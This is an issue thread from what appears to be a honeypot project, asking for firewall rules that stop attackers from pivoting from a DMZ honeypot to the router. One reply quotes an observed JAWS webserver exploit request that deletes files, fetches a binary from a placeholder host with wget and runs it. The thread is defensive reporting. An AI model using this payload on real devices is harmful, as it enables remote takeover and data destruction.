Enhancement: firewall-rules (additional) setup

[jonix-jonixsson]

Suggestion: when the honeypot is setup, add firewall rule(s) so an outside attacker cannot connect to the router via the honeypot, this ought to apply when the honeypot is located on a DMZ (where it has an address of (e.g.) 192.168.x.x (black-net IPs) ,nad the router has IP 192.168.x.1 (a usual address..)
There was someone of us who saw an ssh-attempt to connect from the honeypot to his/hers router/gateway-IP , and that kind of connection ought to be blocked with a firewall rule.
Can a installation question be made if the router will be located on a DMZ, or if it will be directly connected to (wild) internet ,and the result of the question will create and (eventual) rule?
It _is_possible that the ISP can use non-routeable IP-range for their customers and NAT that range (e.g. 10.x.x.x range)

It may be hypothetical, but possible to perform this kind of "relay" attack

[iot-operator]

I have not only saw SSH attempts towards my router from the honeypot, but already saw attempts to do exploitation of JAWS Webserver unauthenticated shell RCE via "GET /shell?cd+/tmp;rm+-rf+*;wget+http://%s/jaws;sh+/tmp/jaws".
Hope this will be implemented soon.